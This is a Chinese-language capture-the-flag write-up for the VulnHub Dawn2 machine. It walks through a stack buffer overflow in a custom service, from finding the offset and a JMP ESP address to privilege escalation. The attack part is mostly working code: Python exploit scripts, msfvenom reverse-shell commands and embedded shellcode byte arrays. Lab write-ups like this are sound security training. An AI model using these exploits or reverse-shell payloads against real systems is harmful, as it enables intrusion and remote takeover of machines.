<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    VulnHub靶場 | Dawn2

    VSole2022-07-29 11:08:59

        "山前山后各有風景,有風無風都會自由"

    項目地址:
    https://download.vulnhub.com/sunset/dawn2.7z
    難度:中等部署環境:virtualbox網絡模式:橋接
    靶機IP:192.168.31.174
    

    主機發現:

    全端口掃描:

    80端口信息收集:

    發現一個zip壓縮包文件,下載解壓發現可執行文件

    漏洞發現:

    執行dawn.exe

    查看此時端口的開放情況:

        1985端口被打開,在使用namp掃描靶機端口開放情況時也掃描到1985端口,所以該程序運行在靶機的1985端口上,在windows上使用immunityDebugger動態調試工具測試該程序是否存在緩沖區溢出漏洞,使用immunityDebugger打開并運行dawn.exe

    在kali上使用python建立socket連接發送payloadimport socket payload = 'A' * 500 + '\x00'try:    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    s.connect(('192.168.31.111', 1985))    s.send(payload.encode())    s.close()    print("payload send successfully")except Exception as e:    print(e)print("error")
    #可以發現EIP, ESP寄存器中都被字符A填充,存在緩沖區溢出漏洞
    

    經測試,在覆蓋EIP寄存器前需要填充272個字符,BBBB剛好覆蓋EIP寄存器,CCCC...覆蓋ESP寄存器

    import socket payload = 'A' * 272 + 'BBBB' + 'CCCCCCCCCCCCCCCC' + '\x00'
    try:    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    s.connect(('192.168.31.111', 1985))    s.send(payload.encode())    s.close()except Exception as e:    print(e)print("error")
    

    在調試工具中尋找 JMP ESP 指令的地址,然后將生成好的shellcode放置在EIP地址的后面,EIP寄存器中用 JMP ESP 指令的地址替換,因為ESP寄存器中存放將要執行的二進制代碼,如果能夠讓CPU執行跳轉到ESP的指令,那么就能夠執行shellcode。

    首先需要在immunityDebugger中添加mona.py

    在GitHub上下載mano.py放到immunityDebugger安裝目錄下的PyCommands文件夾中

    Mona項目地址:https://github.com/corelan/mona
    

    使用mona查找 jmp esp 指令地址 !mona jmp /j esp

    0x345964ba

    0x34581777

    Msfvenom 生成反彈shell的shellcode

    msfvenom -p windows/shell_reverse_tcp LHOST=192.168.31.96 LPORT=8888 -b "\x00" -f c EXITFUNC=thread
    

    python編寫exp

    #!/usr/bin/pythonimport socket
    buff = ("\xda\xc4\xbd\x36\xcc\xf1\x3e\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1""\x52\x31\x6e\x17\x83\xc6\x04\x03\x58\xdf\x13\xcb\x58\x37\x51""\x34\xa0\xc8\x36\xbc\x45\xf9\x76\xda\x0e\xaa\x46\xa8\x42\x47""\x2c\xfc\x76\xdc\x40\x29\x79\x55\xee\x0f\xb4\x66\x43\x73\xd7""\xe4\x9e\xa0\x37\xd4\x50\xb5\x36\x11\x8c\x34\x6a\xca\xda\xeb""\x9a\x7f\x96\x37\x11\x33\x36\x30\xc6\x84\x39\x11\x59\x9e\x63""\xb1\x58\x73\x18\xf8\x42\x90\x25\xb2\xf9\x62\xd1\x45\x2b\xbb""\x1a\xe9\x12\x73\xe9\xf3\x53\xb4\x12\x86\xad\xc6\xaf\x91\x6a""\xb4\x6b\x17\x68\x1e\xff\x8f\x54\x9e\x2c\x49\x1f\xac\x99\x1d""\x47\xb1\x1c\xf1\xfc\xcd\x95\xf4\xd2\x47\xed\xd2\xf6\x0c\xb5""\x7b\xaf\xe8\x18\x83\xaf\x52\xc4\x21\xa4\x7f\x11\x58\xe7\x17""\xd6\x51\x17\xe8\x70\xe1\x64\xda\xdf\x59\xe2\x56\x97\x47\xf5""\x99\x82\x30\x69\x64\x2d\x41\xa0\xa3\x79\x11\xda\x02\x02\xfa""\x1a\xaa\xd7\xad\x4a\x04\x88\x0d\x3a\xe4\x78\xe6\x50\xeb\xa7""\x16\x5b\x21\xc0\xbd\xa6\xa2\x2f\xe9\xb7\x52\xd8\xe8\xc7\xb0""\xa0\x64\x21\xde\xc0\x20\xfa\x77\x78\x69\x70\xe9\x85\xa7\xfd""\x29\x0d\x44\x02\xe7\xe6\x21\x10\x90\x06\x7c\x4a\x37\x18\xaa""\xe2\xdb\x8b\x31\xf2\x92\xb7\xed\xa5\xf3\x06\xe4\x23\xee\x31""\x5e\x51\xf3\xa4\x99\xd1\x28\x15\x27\xd8\xbd\x21\x03\xca\x7b""\xa9\x0f\xbe\xd3\xfc\xd9\x68\x92\x56\xa8\xc2\x4c\x04\x62\x82""\x09\x66\xb5\xd4\x15\xa3\x43\x38\xa7\x1a\x12\x47\x08\xcb\x92""\x30\x74\x6b\x5c\xeb\x3c\x8b\xbf\x39\x49\x24\x66\xa8\xf0\x29""\x99\x07\x36\x54\x1a\xad\xc7\xa3\x02\xc4\xc2\xe8\x84\x35\xbf""\x61\x61\x39\x6c\x81\xa0")
    payload = "A" * 272 + "\x77\x17\x58\x34"  + "\x90" * 32 + buff + "\x00"
    try:    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    s.connect(('192.168.31.111', 1985))    s.send(payload)    s.close()    print("payload send successfully")except Exception as e:    print(e)    print("error")
    

    kali監聽8888端口,python2運行exp

    漏洞利用:

    修改exp,將連接IP改為靶機IP,重新生成shellcode

    msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.31.96 LPORT=8888 -f c -b '\x00' EXITFUNC=threa
    

    修改exp:

    #!/usr/bin/pythonimport socket
    buff = ("\xdd\xc0\xd9\x74\x24\xf4\x58\x2b\xc9\xbb\xca\x52\x3b\x9d\xb1""\x12\x31\x58\x17\x03\x58\x17\x83\x22\xae\xd9\x68\x83\x94\xe9""\x70\xb0\x69\x45\x1d\x34\xe7\x88\x51\x5e\x3a\xca\x01\xc7\x74""\xf4\xe8\x77\x3d\x72\x0a\x1f\x7e\x2c\xf3\xbf\x16\x2f\x0c\x1d""\x5f\xa6\xed\xd1\xf9\xe9\xbc\x42\xb5\x09\xb6\x85\x74\x8d\x9a""\x2d\xe9\xa1\x69\xc5\x9d\x92\xa2\x77\x37\x64\x5f\x25\x94\xff""\x41\x79\x11\xcd\x02")
    payload = "A" * 272 + "\x77\x17\x58\x34"  + "\x90" * 32 + buff + "\x00"
    try:    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    s.connect(('192.168.31.174', 1985))    s.send(payload)    s.close()    print("payload send successfully")except Exception as e:    print(e)print("error")
    

    kali監聽8888端口,python2運行exp

    Flag1:

    權限提升:

    在dawn-daemon主目錄下存在dawn-BETA.exe文件,并且屬主為root

    查看進程,該程序可能正在以root身份運行

    漏洞利用與上述步驟相同:

    #!/usr/bin/pythonimport socket
    buff = ("\xdd\xc0\xd9\x74\x24\xf4\x58\x2b\xc9\xbb\xca\x52\x3b\x9d\xb1""\x12\x31\x58\x17\x03\x58\x17\x83\x22\xae\xd9\x68\x83\x94\xe9""\x70\xb0\x69\x45\x1d\x34\xe7\x88\x51\x5e\x3a\xca\x01\xc7\x74""\xf4\xe8\x77\x3d\x72\x0a\x1f\x7e\x2c\xf3\xbf\x16\x2f\x0c\x1d""\x5f\xa6\xed\xd1\xf9\xe9\xbc\x42\xb5\x09\xb6\x85\x74\x8d\x9a""\x2d\xe9\xa1\x69\xc5\x9d\x92\xa2\x77\x37\x64\x5f\x25\x94\xff""\x41\x79\x11\xcd\x02")
    payload = "A" * 13 + "\x13\x15\x50\x52"  + "\x90" * 32 + buff + "\x00"
    try:    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    s.connect(('192.168.31.174', 1435))    s.send(payload)    s.close()    print("payload send successfully")except Exception as e:    print(e)print("error")
    

    Flag2:

    payloadsocket
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    前言本來是打算來挖它的,去搜索它以往爆出的漏洞,就先復現玩玩了,這次用了三種方法來驗證,分別為用戶級模擬,系統級模擬,
    VulnHub靶場 | Dawn2
    2022-07-29 11:08:59
    主機發現:全端口掃描:80端口信息收集:發現一個zip壓縮包文件,下載解壓發現可執行文件漏洞發現:執行dawn.exe查看此時端口的開放情況:
    weblogic T3 attack&cve
    2023-03-29 10:07:32
    定義了固定的t3header和反序列化標志頭fe010000。RFC1700規定使用“大端”字節序為網絡字節序,所以對生成的payload使用>大端模式打包,I表示unsigned int。CVE-2016-0638復現需要打補丁,找不到懶得打了,簡單說一下繞過,不寫poc了黑名單列表為:+org.apache.c
    驗證環境weblogic/wsee/jaxws/WLSServletAdapter.class的handle方法打上斷點訪問http://127.0.0.1:7001/wls-wsat/CoordinatorPortType關于T3協議T3協議是Weblogic用于通信的獨有的一個協議,Weblogic Server的RMI通信使用它在其他區的Java程序傳輸數據。T3協議的組成這里借一張圖解釋一下關于 T3協議的組成ac ed 00 05是反序列化標志,而在 T3 協議中每個序列化數據包前面都有fe 01 00 00,所以 T3 的序列化標志為fe 01 00 00 ac ed 00 05并且在發送T3協議的時候 還可以發送多個序列化數據 ,可以替換其中一個的序列化數據 實現反序列化攻擊。
    關于遠程代碼執行的常用Payload大家好,我是 Ansar Uddin,我是來自孟加拉國的網絡安全研究員。這是我的第二篇 Bug 賞金文章。今天的話題都是關于 Rce 的利用。攻擊者的能力取決于服務器端解釋器的限制。在某些情況下,攻擊者可能能夠從代碼注入升級為命令注入。
    腳本運行機制在使用該腳本的過程中,用戶僅需要加載MoveKit.cna腳本即可,它將加載所有其他的所需腳本。除此之外,用戶可能還需要對代碼進行編譯,并存放至Assemblies目錄中,具體取決于SharpMove和SharpRDP程序集所要采取的行為。首先,用戶需要選擇一個在遠程系統上執行的命令,命令將通過WMI、DCOM、計劃任務、RDP或SCM執行。然后,使用File方法將文件存儲至目標系統并執行它。在使用信標命令時,它將讀取默認配置,并使用幾個命令行參數。
    Vxscan介紹python3寫的綜合掃描工具,主要用來敏感文件探測,WAF/CDN識別,端口掃描,指紋/服務識別,操作系統識別,弱口令探測,POC掃描,SQL注入,繞過CDN,查詢旁站等功能,主要用來甲方自測或乙方授權測試,請勿用來搞破壞。看到上面的介紹也嚇一跳,這么多功能?
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类